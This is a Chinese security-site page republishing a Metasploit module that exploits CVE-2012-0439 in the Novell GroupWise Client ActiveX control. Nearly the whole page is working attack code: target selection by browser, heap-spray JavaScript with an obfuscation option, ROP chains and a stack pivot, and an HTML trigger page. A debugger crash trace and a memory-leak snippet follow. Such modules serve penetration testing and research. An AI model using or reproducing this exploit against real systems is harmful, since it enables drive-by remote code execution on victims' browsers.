首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution
来源:metasploit.com 作者:rgod 发布时间:2013-02-18  
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
    include Msf::Exploit::RopDb
    include Msf::Exploit::Remote::BrowserAutopwn
 
    autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "9.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :rank       => NormalRanking,
        :classid    => "{601D7813-408F-11D1-98D7-444553540000}",
        :method     => "SetEngine"
    })
 
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",
            'Description'    => %q{
                    This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll
                ActiveX. Several methods in the GWCalServer control use user provided data as
                a pointer, which allows to read arbitrary memory and execute arbitrary code. This
                module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The
                JRE6 needs to be installed to achieve ASLR bypass.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'rgod <rgod[at]autistici.org>', # Vulnerability discovery
                    'juan vazquez'                  # Metasploit module
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-0439' ],
                    [ 'OSVDB', '89700' ],
                    [ 'BID' , '57658' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ],
                    [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ]
                ],
            'Payload'        =>
                {
                    'BadChars'    => "\x00",
                    'Space'       => 1040,
                    'DisableNops' => true
                },
            'DefaultOptions'  =>
                {
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    # gwcls1.dll 12.0.0.8586
                    [ 'Automatic', {} ],
                    [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
                    [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
                    [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ],
                    [ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4' } ],
                    [ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => '0x3e3' } ],
                    [ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x3e3' } ],
                    [ 'IE 9 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x3ed' } ]#'0x5fe' } ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jan 30 2013",
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
            ], self.class)
 
    end
 
    def get_target(agent)
        #If the user is already specified by the user, we'll just use that
        return target if target.name != 'Automatic'
 
        nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
        ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
 
        ie_name = "IE #{ie}"
 
        case nt
        when '5.1'
            os_name = 'Windows XP SP3'
        when '6.0'
            os_name = 'Windows Vista'
        when '6.1'
            os_name = 'Windows 7'
        end
 
        targets.each do |t|
            if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
                print_status("Target selected as: #{t.name}")
                return t
            end
        end
 
        return nil
    end
 
    def ie_heap_spray(my_target, p)
        js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
        js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
        js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
 
        # Land the payload at 0x0c0c0c0c
        case my_target
        when targets[7]
            # IE 9 on Windows 7
            js = %Q|
            function randomblock(blocksize)
            {
                var theblock = "";
                for (var i = 0; i < blocksize; i++)
                {
                    theblock += Math.floor(Math.random()*90)+10;
                }
                return theblock;
            }
 
            function tounescape(block)
            {
                var blocklen = block.length;
                var unescapestr = "";
                for (var i = 0; i < blocklen-1; i=i+4)
                {
                    unescapestr += "%u" + block.substring(i,i+4);
                }
                return unescapestr;
            }
 
            var heap_obj = new heapLib.ie(0x10000);
            var code = unescape("#{js_code}");
            var nops = unescape("#{js_random_nops}");
            while (nops.length < 0x80000) nops += nops;
            var offset_length = #{my_target['Offset']};
            for (var i=0; i < 0x1000; i++) {
                var padding = unescape(tounescape(randomblock(0x1000)));
                while (padding.length < 0x1000) padding+= padding;
                var junk_offset = padding.substring(0, offset_length);
                var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
                while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
                sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
                heap_obj.alloc(sprayblock);
            }
            |
 
        else
            # For IE 6, 7, 8
            js = %Q|
            var heap_obj = new heapLib.ie(0x20000);
            var code = unescape("#{js_code}");
            var nops = unescape("#{js_nops}");
            while (nops.length < 0x80000) nops += nops;
            var offset = nops.substring(0, #{my_target['Offset']});
            var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
            while (shellcode.length < 0x40000) shellcode += shellcode;
            var block = shellcode.substring(0, (0x80000-6)/2);
            heap_obj.gc();
            for (var i=1; i < 0x300; i++) {
                heap_obj.alloc(block);
            }
            var overflow = nops.substring(0, 10);
            |
 
        end
 
        js = heaplib(js, {:noobfu => true})
 
        if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate
        end
 
        return js
    end
 
    def stack_pivot
        pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
        pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
        pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
        pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
        return pivot
    end
 
    def get_payload(t, cli)
        code = payload.encoded
 
        # No rop. Just return the payload.
        return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil?
 
        # Both ROP chains generated by mona.py - See corelan.be
        case t['Rop']
            when :msvcrt
                print_status("Using msvcrt ROP")
                rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
                jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp ___FCKpd___0#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
                rop_payload << jmp_shell
                rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
                rop_payload << [0x0c0c0c10 - 0x426].pack("V")  # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
                rop_payload << [0x77c15ed5].pack("V")          # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
                rop_payload << stack_pivot
                rop_payload << code
            else
                print_status("Using JRE ROP")
                rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
                jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp ___FCKpd___0#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string
                rop_payload << jmp_shell
                rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length)
                rop_payload << [0x0c0c0c10 - 0x426].pack("V")  # Mapped at 0x0c0c0c0c # 0x426 => vtable offset
                rop_payload << [0x7C348B05].pack("V")          # Mapped at 0x0c0c0c10 # xchg eax, esp # ret
                rop_payload << stack_pivot
                rop_payload << code
        end
 
        return rop_payload
    end
 
 
    def load_exploit_html(my_target, cli)
        p  = get_payload(my_target, cli)
        js = ie_heap_spray(my_target, p)
 
        trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200
 
        html = %Q|
        <html>
        <head>
        <script>
        #{js}
        </script>
        </head>
        <body>
        <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'>
        </object>
        <script>
            target.SetEngine(0x0c0c0c0c-0x20);
            setInterval(function(){#{trigger}},1000);
        </script>
        </body>
        </html>
        |
 
        return html
    end
 
    def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        uri   = request.uri
        print_status("Requesting: #{uri}")
 
        my_target = get_target(agent)
        # Avoid the attack if no suitable target found
        if my_target.nil?
            print_error("Browser not supported, sending 404: #{agent}")
            send_not_found(cli)
            return
        end
 
        html = load_exploit_html(my_target, cli)
        html = html.gsub(/^\t\t/, '')
        print_status("Sending HTML...")
        send_response(cli, html, {'Content-Type'=>'text/html'})
    end
 
end
 
 
=begin
 
* Remote Code Exec
 
(240.8d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll -
eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58
eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d:
10335e2d 8a8e4f040000    mov     cl,byte ptr [esi+44Fh]     ds:0023:0c0c103b=??
 
 
.text:103BDDEC                 mov     eax, [ebp+var_4] // var_4 => Engine + 0x20
.text:103BDDEF                 test    esi, esi
.text:103BDDF1                 jnz     short loc_103BDE17
.text:103BDDF3                 cmp     [eax+426h], esi
.text:103BDDF9                 jz      short loc_103BDE17 // Check function pointer against nil?
.text:103BDDFB                 mov     ecx, [ebp+arg_8]
.text:103BDDFE                 mov     edx, [ebp+arg_4]
.text:103BDE01                 push    ecx
.text:103BDE02                 mov     ecx, [eax+42Ah]  // Carefully crafted object allows to control it
.text:103BDE08                 push    edx
.text:103BDE09                 mov     edx, [eax+426h] // Carefully crafted object allows to control it
.text:103BDE0F                 push    ecx
.text:103BDE10                 call    edx  // Win!
 
* Info Leak
 
// Memory disclosure => 4 bytes from an arbitrary address
// Unstable when info leaking and triggering rce path...
target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll
var leak = target.GetMiscAccess();
alert(leak);
 
=end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS13-005 HWND_BROADCAST PoC
·Polycom HDX Telnet Authorizati
·Schneider Electric Accutech Ma
·iRobosoft Internet Browser Mem
·Microsoft Wuindows Movie Maker
·Foxit Reader Plugin URL Proces
·Google Chrome Silent HTTP Auth
·Microsoft Internet Explorer SL
·FreeFloat FTP 1.0 Raw Commands
·EChat Server 3.1 BoF-0day
·Windows Media Player 9.0.0 .wa
·xMatters Alarmpoint BoF-0day
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved